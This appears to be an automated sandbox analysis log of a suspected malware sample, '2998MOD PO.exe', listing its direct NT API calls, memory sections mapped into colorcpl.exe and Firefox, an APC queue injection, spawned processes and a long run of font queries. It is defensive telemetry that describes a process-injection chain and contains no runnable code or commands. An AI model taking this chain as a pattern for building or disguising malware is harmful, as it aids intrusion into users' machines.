                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: NULL target: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: NULL target: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe protection: read write
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: NULL target: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\colorcpl.exe | Thread APC queued: target process: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Process created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
                Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: sePlrCtAXqpc.exe, 00000007.00000000.1954566994.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560799779.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562768183.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: sePlrCtAXqpc.exe, 00000007.00000000.1954566994.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560799779.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562768183.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: sePlrCtAXqpc.exe, 00000007.00000000.1954566994.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560799779.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562768183.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: sePlrCtAXqpc.exe, 00000007.00000000.1954566994.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000007.00000002.3560799779.0000000001960000.00000002.00000001.00040000.00000000.sdmp, sePlrCtAXqpc.exe, 00000009.00000002.3562768183.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Users\user\Desktop\2998MOD PO.exe VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
